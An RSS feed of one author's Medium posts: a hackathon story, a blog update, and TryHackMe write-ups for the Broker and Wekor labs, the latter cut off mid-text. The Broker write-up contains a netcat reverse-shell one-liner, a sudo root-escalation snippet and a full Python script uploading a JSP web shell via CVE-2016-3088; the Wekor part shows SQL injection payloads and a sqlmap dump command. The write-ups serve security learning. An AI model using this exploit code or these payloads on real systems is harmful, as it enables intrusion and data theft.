<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:cc="http://cyber.law.harvard.edu/rss/creativeCommonsRssModule.html">
    <channel>
        <title><![CDATA[Stories by Anubhav Uniyal on Medium]]></title>
        <description><![CDATA[Stories by Anubhav Uniyal on Medium]]></description>
        <link>https://medium.com/@anubhavuniyal?source=rss-595cd3c0d173------2</link>
        <image>
            <url>https://cdn-images-1.medium.com/fit/c/150/150/1*S44ra_6aFm3WRI0vQIlUeQ.jpeg</url>
            <title>Stories by Anubhav Uniyal on Medium</title>
            <link>https://medium.com/@anubhavuniyal?source=rss-595cd3c0d173------2</link>
        </image>
        <generator>Medium</generator>
        <lastBuildDate>Mon, 18 May 2026 06:30:06 GMT</lastBuildDate>
        <atom:link href="https://medium.com/@anubhavuniyal/feed" rel="self" type="application/rss+xml"/>
        <webMaster><![CDATA[yourfriends@medium.com]]></webMaster>
        <atom:link href="http://medium.superfeedr.com" rel="hub"/>
        <item>
            <title><![CDATA[Not A Review: Why You Should Participate in a Hackathon]]></title>
            <link>https://medium.com/readers-club/not-a-review-why-you-should-participate-in-a-hackathon-d24bb0bc20f6?source=rss-595cd3c0d173------2</link>
            <guid isPermaLink="false">https://medium.com/p/d24bb0bc20f6</guid>
            <category><![CDATA[technology]]></category>
            <category><![CDATA[hackathons]]></category>
            <category><![CDATA[life]]></category>
            <category><![CDATA[programming]]></category>
            <category><![CDATA[storytelling]]></category>
            <dc:creator><![CDATA[Anubhav Uniyal]]></dc:creator>
            <pubDate>Sun, 15 Dec 2024 18:44:41 GMT</pubDate>
            <atom:updated>2024-12-16T01:53:20.202Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Z853VN8InGZz5rcPpVHrGQ.jpeg" /><figcaption>Me And My Teammates</figcaption></figure><p>Participating in a hackathon can be one of the most rewarding experiences for tech enthusiasts, whether you’re a seasoned developer or simply looking to challenge yourself. Recently, my company organized a hackathon, and I’m here to share why I believe everyone in tech should dive into such events. With a well-organized event and the right motivation — free goodies, prizes, food, and even alcohol — there’s so much to gain. More importantly, hackathons are about the learning, collaboration, and unforgettable memories you make.</p><h4>Chapter 0 — What is a Hackathon anyway?</h4><p>For those unfamiliar, a hackathon is an event where teams of tech professionals or enthusiasts come together to solve problems or create new solutions within a limited time frame, typically 24 to 72 hours. Teams often include members from diverse disciplines like frontend developers, backend engineers, network experts, and, less often, DevOps engineers, depending on the project’s requirements.</p><p>The goal isn’t to deliver a polished, production-grade product but rather to present a working prototype of an idea. It’s all about innovation and creativity under pressure. Winners are usually awarded cash prizes, exclusive goodies, and recognition for their efforts. Beyond the tangible rewards, it’s an intense yet fun environment where you push your boundaries, learn new skills, meet like-minded people, and work like you always wanted to, with alcohol by your side.</p><h4>Chapter 1 — My Motivation and Assembling a Team</h4><p>As a DevOps Engineer, my role typically involves optimizing processes and tools. While I’m well-versed in best practices, I’ve rarely had the chance to dive deep into programming. 
A hackathon seemed like the perfect opportunity to explore uncharted waters and build something meaningful from scratch.</p><p>I rallied a team of my colleagues and close friends, all DevOps engineers like me. While it might seem counterintuitive to form a team without cross-functional expertise, our camaraderie and shared understanding of our roles made it an easy choice. After all, hackathons aren’t just about winning — they’re also about having fun and unleashing your creativity without worrying about perfection. Since this was an internal company event, the competitive yet collaborative vibe among colleagues made it even more exciting.</p><h4>Chapter 2 — The Ideation Stage</h4><p>The hackathon’s judging criteria included:</p><ul><li><strong>40 points</strong> for the idea’s impact</li><li><strong>50 points</strong> for the working demo</li><li><strong>10 points</strong> for cross-team collaboration</li></ul><p>Since our team lacked cross-team collaboration (due to the team size cap of four members), we knew those 10 points were out the window. That meant we had to ace the impact and demo categories.</p><p>For our project, we focused on creating an <strong>Internal Developer Platform (IDP)</strong>. As DevOps engineers, we often find ourselves as bottlenecks when developers need features deployed or infrastructure provisioned. Our IDP aimed to empower developers to perform critical tasks like onboarding new microservices and updating Kong routes independently through a user-friendly interface. This wasn’t just a project to win the competition — it was a solution to a real pain point in our organization.</p><h4>Chapter 3 — And we are off to the races</h4><p>After two weeks of anticipation, the hackathon finally kicked off. 
We received a starter kit that included a commemorative jacket, snacks, and energy drinks — essentials for the grueling 48 hours ahead.</p><p>Without diving too deep into technical details, here’s a high-level overview of our stack:</p><ul><li><strong>Backstage.io</strong> for the user interface</li><li><strong>GitHub Actions</strong> for CI</li><li><strong>Terraform</strong> for CD</li></ul><p>Despite being fully immersed in the hackathon, we couldn’t completely escape our regular duties. Developers frequently approached us with requests for provisioning infrastructure or resolving API gateway issues. Balancing our day-to-day responsibilities with the hackathon was challenging but also a reminder of the potential impact of our project.</p><p>Working with unfamiliar tools like TypeScript and Backstage.io posed significant hurdles. The documentation was sparse, and AI tools didn’t always provide clear answers. However, the internal nature of the hackathon meant we could reach out to colleagues for guidance. A friendly UI engineer saved the day multiple times when we hit roadblocks.</p><h4>Chapter 4 — The Final Countdown</h4><p>After 48 hours of intense coding, countless energy drinks, and some late-night beers, we had a working prototype. It wasn’t perfect, but it was functional — and that’s the essence of a hackathon.</p><p>We headed home for a short break before the final presentation. Exhausted but satisfied, we were ready to showcase our idea.</p><h4>Chapter 5 — The Day of Reckoning</h4><p>The hackathon featured 45 teams, but only the top 15 would progress to the final round. The pre-judging panel included VPs from tech, product, and marketing. They evaluated projects based on impact, functionality, and creativity.</p><p>Our demo went smoothly, and we felt confident about our chances. However, when the top 15 teams were announced, our hearts sank — our team name wasn’t called. 
            Just as we were packing up, we discovered there had been a mix-up with another team’s name. Thankfully, we were still in the running.</p><p>During the final presentation to a judging panel made up of our CEO, CTO, and other senior leaders, our demo worked flawlessly. Developers in the audience were visibly excited about the potential of our platform. Unfortunately, our idea didn’t resonate as strongly with the judges, who likely prioritized broader organizational impact over technical innovation.</p><p>The winners were announced a few hours later, and while we didn’t make the top three, we had no regrets. The winning projects were truly outstanding and deserved recognition. We celebrated their success and cherished the experience we’d gained.</p><h4>Chapter 6 — Conclusion</h4><p>Participating in a hackathon is an unparalleled experience that every tech professional should try at least once. It pushes you out of your comfort zone, introduces you to new technologies, and fosters a spirit of collaboration and innovation. For me, the hackathon was an opportunity to bond with my team, tackle real-world challenges, and create something impactful — even if it wasn’t perfect.</p><p>Whether you join for the prizes or the learning, a hackathon offers memories and lessons that stay with you long after the event ends. So, the next time you see a hackathon happening — be it internal or public — don’t hesitate. Dive in, and who knows? 
            You might just surprise yourself with what you can achieve in 48 hours.</p><hr><p><a href="https://medium.com/readers-club/not-a-review-why-you-should-participate-in-a-hackathon-d24bb0bc20f6">Not A Review: Why You Should Participate in a Hackathon</a> was originally published in <a href="https://medium.com/readers-club">Readers Club</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[The Three-Year Update]]></title>
            <link>https://medium.com/readers-club/the-three-year-update-91212a2943ec?source=rss-595cd3c0d173------2</link>
            <guid isPermaLink="false">https://medium.com/p/91212a2943ec</guid>
            <category><![CDATA[travel]]></category>
            <category><![CDATA[technology]]></category>
            <category><![CDATA[blog]]></category>
            <category><![CDATA[life]]></category>
            <category><![CDATA[updates]]></category>
            <dc:creator><![CDATA[Anubhav Uniyal]]></dc:creator>
            <pubDate>Sun, 08 Dec 2024 18:20:37 GMT</pubDate>
            <atom:updated>2024-12-09T15:18:14.130Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ErjzPirVOB56_qgOokzrOg.jpeg" /></figure><p>Hello Dear Readers, I honestly have no idea how many of you are still following my blog (if any!), especially since it’s been over three years since I last posted. <strong><em>Ahem</em></strong>, but here we are. It’s a new year, and I’ve set myself a new goal: to write one blog post every weekend.</p><p>Now, don’t worry — I’m not just saying this to fill up space with random, half-baked thoughts. Quality will always come first. I might not be a professional writer like some of the other folks out there, but I can assure you that whatever I write will be the best I can offer at that moment.</p><p>As for the content, I’m keeping things open-ended. My previous posts were mostly tech-related, but I’m thinking of broadening my horizons. Expect a mix of topics: reflections on life, new food discoveries, travel stories from different cities and countries, and of course, tech. So, in short — <em>whatever sparks my interest</em>.</p><p>A little context for anyone who’s stumbled here since I last posted: I originally started this blog during the pandemic as a college student who loved cybersecurity, mostly out of boredom, if I’m being honest. But, alas, life had other plans, and I wasn’t able to fully pursue that interest. That said, not everything was bad. A lot has happened since then. I graduated from college, had to move out of my hometown, and now I’m working as a DevOps Engineer here in Bangalore, India. Life since then has been nothing short of a roller coaster ride. But after some time to reflect and re-calibrate, I’ve realized I miss writing and sharing my thoughts. So, as a Millennial with the cliché “new year, new me” mindset, I want to make this blog a regular part of my routine again.</p><p>And that’s it. That’s my life update in a nutshell. 
            If any of you have suggestions on what topics you’d like to see me explore, feel free to drop them in the comments. I’ll do my best to make them happen!</p><p><em>See you soon,</em><br><em>Anubhav</em></p><hr><p><a href="https://medium.com/readers-club/the-three-year-update-91212a2943ec">The Three-Year Update</a> was originally published in <a href="https://medium.com/readers-club">Readers Club</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[TryHackMe | Broker Writeup]]></title>
            <link>https://infosecwriteups.com/tryhackme-broker-writeup-fb75b30cf674?source=rss-595cd3c0d173------2</link>
            <guid isPermaLink="false">https://medium.com/p/fb75b30cf674</guid>
            <category><![CDATA[ctf-writeup]]></category>
            <category><![CDATA[ctf]]></category>
            <category><![CDATA[write]]></category>
            <category><![CDATA[tryhackme]]></category>
            <category><![CDATA[tryhackme-walkthrough]]></category>
            <dc:creator><![CDATA[Anubhav Uniyal]]></dc:creator>
            <pubDate>Fri, 12 Mar 2021 11:32:13 GMT</pubDate>
            <atom:updated>2021-03-13T14:50:13.562Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tjrAZiW-kyPi9Yu8Fo6VyQ.png" /></figure><h3><strong>Overview</strong></h3><p>Hey, how’s it going guys. I am back with another write-up, this time trying <a href="https://tryhackme.com/room/broker">Broker</a> by <a href="https://tryhackme.com/p/M0N573R777">M0N573R777</a> and <a href="https://tryhackme.com/p/ripcurlz">ripcurlz</a>. This was a very interesting and unique box, showing how thin the security of many IoT deployments is. The box starts with a port scan of the higher ports to identify the services running on them. One of the ports hosts an MQTT broker, through which we find a topic to subscribe to. We then take a public exploit for a known CVE, modify it a little to get command execution on the machine, and catch a reverse shell. Finally, we abuse a misconfigured sudo rule on a script to gain root. So, without anything else to say, let’s get started.</p><h3><strong>Wait, Before Proceeding!</strong></h3><p>There are a few things you should know and understand before you continue with the room.</p><p><em>What is MQTT?</em></p><p>MQTT (MQ Telemetry Transport) is a lightweight publish/subscribe messaging protocol used mainly by industrial IoT devices such as sensors and meters, although it also shows up elsewhere, for example in smart home automation systems.</p><p><em>Why does MQTT exist?</em></p><p>Everyone (at least, everyone reading this article) knows that the internet is built on the TCP/IP model. The issue is not TCP/IP itself but the request/response protocols usually layered on top of it, such as HTTP, which carry a lot of header overhead per message and expect a reasonably stable connection. On constrained devices like sensors, with little processing power and memory and often an unreliable, low-bandwidth link, that overhead quickly becomes a problem. 
            This is where MQTT comes in: it runs on top of TCP, keeps its fixed header down to two bytes, and uses a publish/subscribe model designed with unstable, low-bandwidth connections in mind. Because the TCP session stays open, with keep-alive pings, the broker knows when a client disappears and can publish that client’s “last will” message on its behalf.</p><p><em>What is the publish/subscribe messaging model?</em></p><p>Unlike the traditional request/response client-server model (think HTTP), in which a client talks directly to an endpoint (another client, or a server), MQTT clients are split into two roles: a sender (a publisher, in MQTT terms) and a consumer that receives the data (an MQTT subscriber). Publisher and subscriber know nothing about each other and are never in direct contact. A third component, the MQTT broker, acts as the middleman, forwarding every message published on a topic to <em>any client that has subscribed to it</em>. That last part is the catch: if the broker is reachable and enforces neither authentication nor per-topic ACLs, anyone who can connect can subscribe to everything. (OOPS)</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/0*lY1gvBSWViXDDy2m.jpg" /><figcaption>Credits: <a href="https://behrtech.com/blog/mqtt-in-the-iot-architecture/">https://behrtech.com/blog/mqtt-in-the-iot-architecture/</a></figcaption></figure><p>If you want to know more about what MQTT is and how it works, visit <a href="http://www.steves-internet-guide.com/mqtt-basics-course/">http://www.steves-internet-guide.com/mqtt-basics-course/</a>.</p><p>All right, with that out of the way.</p><h3><strong>Let’s Break In!</strong></h3><p>As always, start off with an Nmap scan</p><pre>sudo nmap -sS -sC -sV -oA nmap/broker -vv *THM Box IP*</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*y0quVntwWHUg6zF3LeO4rg.png" /></figure><p>Nmap shows that two ports are open: 1883 (MQTT) and 8161 (the ActiveMQ web console).</p><p>Port 8161 is the web console of Apache ActiveMQ, a message broker from the Apache Software Foundation; ActiveMQ also speaks MQTT, and that is what is listening on 1883. Clicking on “Manage ActiveMQ broker”, a box pops up asking for credentials. 
            Trying the default credentials logs us in as admin.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*DyuT3SG_HVeJdNLzaheJBQ.png" /></figure><p>The next task requires an MQTT client to read the messages flowing through the broker. Two things are needed: an MQTT client to connect to the service, and a “topic” to subscribe to, so that we <em>act as a subscriber</em> and receive whatever the <em>publisher</em> sends.</p><p>Since we don’t know any topics, let’s check the broker for a list. The “Topics” section of the console lists several, “secret_chat” being one of them. Interesting.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*OSyqIaWVXwvvvpW1ohMtaA.png" /></figure><p>To subscribe to the topic, first install an MQTT client of your choice. <a href="https://github.com/eclipse/mosquitto">Eclipse Mosquitto</a>, developed by the Eclipse Foundation, ships a tool called mosquitto_sub which lets you act as a subscriber.</p><p>Now, to subscribe to the topic, use the following command</p><pre>mosquitto_sub -t &#39;secret_chat/#&#39; -h *THM Box IP* -p 1883 -V mqttv31 --tls-version tlsv1.2</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*0EtqMGlzu3Pcd3Avf67Otw.png" /></figure><blockquote>Here, -t: topic filter to subscribe to; #: a wildcard that matches any number of levels below secret_chat; -h: hostname or IP address; -p: port of the MQTT service; -V: MQTT protocol version to speak (3.1 here). --tls-version only takes effect once TLS is enabled with --cafile, --capath or --psk, so on the plaintext port 1883 it changes nothing and can be dropped.</blockquote><p><strong>P.S.</strong> Topic names in MQTT are hierarchical, with levels separated by “/”, which is why the “#” and “+” wildcards exist: “#” matches any number of trailing levels and may only appear as the last level, while “+” matches exactly one level.</p><p>It would appear that two people are using the broker as a chat service. Reading their chat, they seem to be discussing a game. 
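</p><p>The following is an added example, not code from the write-up: a matcher implementing the MQTT 3.1.1 topic-filter rules just described, so you can see exactly what a subscription such as secret_chat/# is handed. The sample filters and topic names are constructed, with the write-up’s filter among them.</p>

```python
"""Topic-filter matching as specified in MQTT 3.1.1, section 4.7.
Added example, not from the write-up; sample names below are constructed."""


def _filter_levels(topic_filter: str) -> list:
    """Split a filter into levels and reject wildcard misuse:
    '#' must be the whole last level, '+' must be a whole level by itself."""
    if not topic_filter:
        raise ValueError("empty topic filter")
    levels = topic_filter.split("/")
    for i, level in enumerate(levels):
        if "#" in level and (level != "#" or i != len(levels) - 1):
            raise ValueError(f"'#' must be the last level on its own: {topic_filter!r}")
        if "+" in level and level != "+":
            raise ValueError(f"'+' must occupy a whole level: {topic_filter!r}")
    return levels


def topic_matches(topic_filter: str, topic: str) -> bool:
    """True if a subscription to topic_filter receives messages published on topic."""
    flevels = _filter_levels(topic_filter)
    tlevels = topic.split("/")
    # A wildcard at the first level never matches a '$' topic such as '$SYS/...'.
    if tlevels[0].startswith("$") and flevels[0] in ("#", "+"):
        return False
    for i, flevel in enumerate(flevels):
        if flevel == "#":
            return True           # the parent level itself and everything below it
        if i >= len(tlevels):
            return False          # filter has more levels than the topic
        if flevel != "+" and flevel != tlevels[i]:
            return False
    return len(flevels) == len(tlevels)


def receiving_filters(filters, topic: str) -> list:
    """Which of the subscribed filters are handed a message published on topic."""
    return [f for f in filters if topic_matches(f, topic)]


# Constructed sample: the write-up's filter plus a few neighbours on the same broker.
SAMPLE_FILTERS = ["secret_chat/#", "secret_chat/+/status", "#", "$SYS/#"]
SAMPLE_TOPICS = ["secret_chat", "secret_chat/room1/msg", "secret_chat/bob/status",
                 "other/topic", "$SYS/broker/uptime"]


def demo() -> dict:
    """Map each sample topic to the filters that would receive it."""
    return {t: receiving_filters(SAMPLE_FILTERS, t) for t in SAMPLE_TOPICS}
```

<p>demo() reports which filters receive each topic: secret_chat/# picks up the parent topic and every level below it, a bare # picks up every normal topic on the broker, and $SYS topics are only reachable through an explicit $SYS/# filter. That is exactly why a broker without ACLs hands the chat to anyone who connects.</p><p>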
            That’s an interesting way of using the service, not too secure though.</p><p>Now, to get onto the machine, we need to exploit a known ActiveMQ vulnerability, CVE-2016-3088 (arbitrary file upload through the fileserver webapp’s PUT and MOVE methods, fixed in 5.14.0). Searching <a href="https://www.exploit-db.com/">exploit-db</a>, an exploit is available, but it doesn’t work as advertised and needs some changes.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*jidkcMA0G9LKV_WO1j6V4g.png" /></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kjt84g-7NWO463dZKrkzJw.png" /></figure><p>The exploit uses the HTTP PUT method to upload the payload into the fileserver directory. It fails because the fileserver webapp only serves what is uploaded as static content; a JSP placed there is never compiled or executed. The next logical step is to move it to a directory where it will be. The question then arises: where?</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*DI8L6IGhgM7UZaWapdH86g.png" /></figure><p>While searching for a working version of the exploit, I came across this great article by the <a href="https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30">Knownsec 404</a> team, which explains the vulnerability in depth, why the public exploit doesn’t work, and how to make it work.</p><p>The Knownsec 404 team moves the file into a directory called “apache-activemq-<em>someversionnumber</em>”, that is, into a webapp under the ActiveMQ installation directory. The next hurdle is figuring out the version number, and with it the path, of this broker. Nmap didn’t give us one, so we need to find it manually. Using GoBuster, let’s try to find some endpoints.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Ha-5vVKZLaVwXG_3U8Lz4w.png" /></figure><p>Remember to set the “Authorization” header on the requests (GoBuster takes it with -H, or the credentials with -U and -P), otherwise the application just answers with 401 (Unauthorized). 
            We have many results; on visiting the first directory, the version number, along with the full installation path, is reflected on the page.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*7ffSu1jBYGI_-JM-55FQDA.png" /><figcaption>Focus on activemq.home</figcaption></figure><p>Now we can be absolutely sure that activemq.home is the path we need to move our shell into for it to be executed. Let’s make use of the MOVE method and set the Destination header to a path inside activemq.home/webapps/admin, to move our web shell there.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BgKQYVeLwakr74auTU9uZQ.png" /></figure><p>Then go to “*THM box IP*:8161/admin/cmd.jsp?cmd=” and give the cmd parameter whatever you would like to execute on the machine.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*v7CnuH3Ehf4nwikb43Xb2g.png" /></figure><p>And we have command execution, which means we can get a reverse shell back to our machine. Using the normal bash reverse shell one-liner, I was unable to get a reverse shell, probably some bad characters messing up the command, so I made use of the netcat reverse shell one-liner.</p><pre>nc -e /bin/bash *Your tun0 IP* *port you’re listening on*</pre><p>Remember to URL-encode the spaces, either as a “+” sign or as “%20”, otherwise the command won’t work.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Voz08q1d6C3y_N4v9stI1g.png" /><figcaption>Upgrading the reverse shell</figcaption></figure><p>The reverse shell comes back as the activemq user. Running sudo -l shows that activemq may run a Python script as root, and the script file itself is owned by activemq. That means we can replace its contents and run it through sudo to get a root shell. Replace the contents of the script with</p><pre>import os<br>os.system("/bin/bash")</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*lKJalkGH7WB8zHTv-fYpDQ.png" /></figure><p>So, this was the box guys. 
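</p><p>To tie the web part of the box together, here is an added example that is not the write-up’s code nor the exploit-db script: it performs the PUT into fileserver, the MOVE into activemq.home/webapps/admin and the percent-encoded cmd request using only Python’s standard library. The target host, the default credentials, the activemq.home path and the small cmd.jsp body are assumptions, and it is meant to be pointed at the lab box only.</p>

```python
"""CVE-2016-3088 style upload chain against the ActiveMQ web console: PUT the
JSP into /fileserver/, MOVE it into a webapp that executes JSP, then drive it
with a percent-encoded cmd parameter. Added example, not the write-up's or
exploit-db's code; target, credentials, activemq.home and the JSP body are
assumptions, and it is meant for the lab box only."""
import base64
import http.client
from urllib.parse import quote

# Angle brackets are built at runtime so the listing survives being embedded in HTML.
LT, GT = chr(60), chr(62)

# Assumed minimal web shell; the write-up does not reproduce its cmd.jsp.
JSP_SHELL = (
    f'{LT}%@ page import="java.io.*" %{GT}'
    f'{LT}% String c = request.getParameter("cmd"); if (c != null) {{'
    ' Process p = Runtime.getRuntime().exec(c);'
    ' BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));'
    f' String l; while ((l = r.readLine()) != null) out.println(l); }} %{GT}'
)


def basic_auth_header(user: str, password: str) -> dict:
    """HTTP Basic header; without it the console answers 401, as GoBuster showed."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return {"Authorization": f"Basic {token}"}


def move_destination(activemq_home: str, webapp: str, name: str) -> str:
    """Destination header for MOVE: an absolute file:// URL inside a webapp whose
    JSPs are compiled and run (admin or api), unlike the static fileserver."""
    return f"file://{activemq_home}/webapps/{webapp}/{name}"


def cmd_url(webapp: str, name: str, command: str) -> str:
    """Request path for the shell, with every space and slash percent-encoded."""
    return f"/{webapp}/{name}?cmd={quote(command, safe='')}"


def _request(conn, method, path, headers, body=None):
    conn.request(method, path, body=body, headers=headers)
    resp = conn.getresponse()
    data = resp.read()            # drain so the connection can be reused
    return resp.status, data


def upload_shell(host, port, creds, activemq_home, webapp="admin", name="cmd.jsp"):
    """Return the PUT and MOVE status codes; the server answers 204 to both on success."""
    hdrs = basic_auth_header(*creds)
    conn = http.client.HTTPConnection(host, port, timeout=10)
    put_status, _ = _request(conn, "PUT", f"/fileserver/{name}", hdrs, JSP_SHELL)
    move_hdrs = {**hdrs, "Destination": move_destination(activemq_home, webapp, name)}
    move_status, _ = _request(conn, "MOVE", f"/fileserver/{name}", move_hdrs)
    conn.close()
    return put_status, move_status


def run_command(host, port, creds, command, webapp="admin", name="cmd.jsp") -> str:
    """Execute command through the moved shell and return what it printed."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    _, data = _request(conn, "GET", cmd_url(webapp, name, command), basic_auth_header(*creds))
    conn.close()
    return data.decode(errors="replace")


if __name__ == "__main__":
    # Assumed lab values: console on 8161, default creds, path read off the admin page.
    TARGET, CREDS = ("10.10.10.10", 8161), ("admin", "admin")
    print(upload_shell(*TARGET, CREDS, "/opt/apache-activemq-5.9.0"))
    print(run_command(*TARGET, CREDS, "id"))
```

<p>Once upload_shell() returns (204, 204), run_command() with "id" should come back with the output of id; from there the netcat one-liner above goes in as the command, with cmd_url() doing the encoding that the write-up reminds you about.</p><p>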
            Hope you guys enjoyed it.</p><p>If you have any suggestions, do let me know in the comments.</p><p>Have a beautiful day!</p><hr><p><a href="https://infosecwriteups.com/tryhackme-broker-writeup-fb75b30cf674">TryHackMe | Broker Writeup</a> was originally published in <a href="https://infosecwriteups.com">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[TryHackMe | Wekor Writeup]]></title>
            <link>https://infosecwriteups.com/tryhackme-wekor-writeup-a01b851f651d?source=rss-595cd3c0d173------2</link>
            <guid isPermaLink="false">https://medium.com/p/a01b851f651d</guid>
            <category><![CDATA[tryhackme]]></category>
            <category><![CDATA[ctf]]></category>
            <category><![CDATA[ctf-writeup]]></category>
            <category><![CDATA[tryhackme-walkthrough]]></category>
            <category><![CDATA[walkthrough]]></category>
            <dc:creator><![CDATA[Anubhav Uniyal]]></dc:creator>
            <pubDate>Tue, 09 Mar 2021 12:44:30 GMT</pubDate>
            <atom:updated>2021-03-10T09:34:22.354Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*EnzgzoNnql5RpoCW258Pow.png" /></figure><h3><strong>Overview</strong></h3><p>Hey, how’s it going guys. I am back with another write-up, this time trying Wekor by ustoun0. This was an awesome machine that proved to be harder than I had initially thought.</p><ul><li><a href="https://tryhackme.com/room/wekorra">Wekor</a></li><li><a href="https://tryhackme.com/p/ustoun0">TryHackMe | ustoun0</a></li></ul><p>We start with a simple port scan and see that port 80 is open. Some directory brute-forcing on the initial website leads us to another website. Poking around that one, we find a SQL injection vulnerability and use SQLMap to extract data from the database. Going through the dump, we find some WordPress credentials. Logged into WordPress, we edit a PHP template to get a reverse shell. Once on the machine, we enumerate the Memcached service to find the user’s password. After that, we reverse an ELF binary and plant a fake system binary on its search path to get root. So, without anything else to say, let’s get started.</p><h3>Let’s break in!</h3><p>As always, start off with an Nmap scan.</p><pre>sudo nmap -sS -sV -sC -oA nmap/wekor *THM Box IP* -vv</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*oiIyU68f-7QXe1vFc8ybQw.png" /></figure><p>Nmap shows only two open ports: 22 (SSH) and 80 (HTTP). Let’s visit the website on port 80.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fGFojmbUghk2ZcONPgf_Fw.png" /></figure><p>On visiting the website, we are greeted with a message.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*X2r1I2Mrpj3l4STkqk2bmw.png" /></figure><p>There is also a robots.txt on the website, and it lists many different directory paths. 
            Sadly, all of them return 404 (Not Found), except for one, “/comingreallysoon”.<br>Here we learn that the actual website lives at “/it-next”. Let’s visit it.</p><p>It is some company’s website offering computer solutions. After some poking around, we find a form field on the checkout part of the site that asks for a coupon code.<br>Testing for a possible SQL injection by submitting just a single quote, the website reflects a database error message, which means our input reaches the query unescaped.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*EK44VFctnNAnYnQQ1YUaaQ.png" /><figcaption>Submitting &#39; or 1=1 -- - (without any quotes around it) as the coupon code returns the actual coupon.</figcaption></figure><p>It is certain that the “Apply Coupon” field is vulnerable to SQL injection, so let’s run SQLMap on it and see what we can uncover.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*pj0a6ehDnlqjnbN2nHbJzg.png" /><figcaption>Yes, I did change my shell midway. Don’t ask me why, I have no explanation for my actions</figcaption></figure><pre>sqlmap -r $PWD/ApplyCoupon.req --dump-all --batch</pre><blockquote>Here -r: points SQLMap at a saved raw HTTP request; give it the full path, otherwise it errors out. --dump-all: dump every table reachable through the injection to the local machine. --batch: accept the default answer to every prompt, so the run is never paused in the background waiting for user interaction.</blockquote><p><strong>P.S.</strong> You can easily capture the request using any proxy tool.</p><p>Since I primarily use Burp for my proxying needs, I can give you a little help with that. Put Burp in intercept mode, proxy your browser through it, and once Burp intercepts the request, right-click it and choose “Save item”. Now you can pass the file to SQLMap. One little nugget of information: replace the value of the parameter you want to test with a “*”. 
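</p><p>As an added example, not the site’s PHP and not anything from the write-up, here is the coupon lookup written the vulnerable way next to the parameterised way, run against an in-memory SQLite table that stands in for the site’s real database. The coupon rows are constructed.</p>

```python
"""Coupon lookup: string-built SQL next to a parameterised query, exercised
with the payloads from the write-up. Added example, not the site's code;
SQLite stands in for the real database and the coupon rows are constructed."""
import sqlite3

SAMPLE_COUPONS = [("WELCOME10", 10), ("STAFF50", 50), ("VIP90", 90)]


def make_db() -> sqlite3.Connection:
    """Fresh in-memory database holding the constructed coupon table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE coupons (code TEXT PRIMARY KEY, discount INTEGER)")
    conn.executemany("INSERT INTO coupons VALUES (?, ?)", SAMPLE_COUPONS)
    return conn


def apply_coupon_vulnerable(conn, code: str) -> list:
    """String concatenation: the user's text becomes part of the SQL grammar."""
    sql = "SELECT code, discount FROM coupons WHERE code = '" + code + "'"
    return conn.execute(sql).fetchall()


def apply_coupon_safe(conn, code: str) -> list:
    """Placeholder binding: the driver passes the text as a value, never as SQL."""
    return conn.execute("SELECT code, discount FROM coupons WHERE code = ?", (code,)).fetchall()


def probe(conn, lookup, payload: str) -> dict:
    """Run one payload through a lookup and report rows or the database error."""
    try:
        return {"rows": lookup(conn, payload), "error": None}
    except sqlite3.Error as exc:
        return {"rows": None, "error": str(exc)}


# A legitimate code, the lone quote that made the site error, and the bypass.
PAYLOADS = ["STAFF50", "'", "' or 1=1 -- -"]


def demo() -> dict:
    """Compare both lookups on every payload."""
    conn = make_db()
    return {
        p: {"vulnerable": probe(conn, apply_coupon_vulnerable, p),
            "safe": probe(conn, apply_coupon_safe, p)}
        for p in PAYLOADS
    }
```

<p>demo() reproduces the three behaviours seen on the real site: a normal code returns its row, a lone quote makes the string-built query fail with a syntax error (the message the page reflected), and ' or 1=1 -- - returns every coupon, while the parameterised lookup treats each payload as a literal code and simply finds nothing.</p><p>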
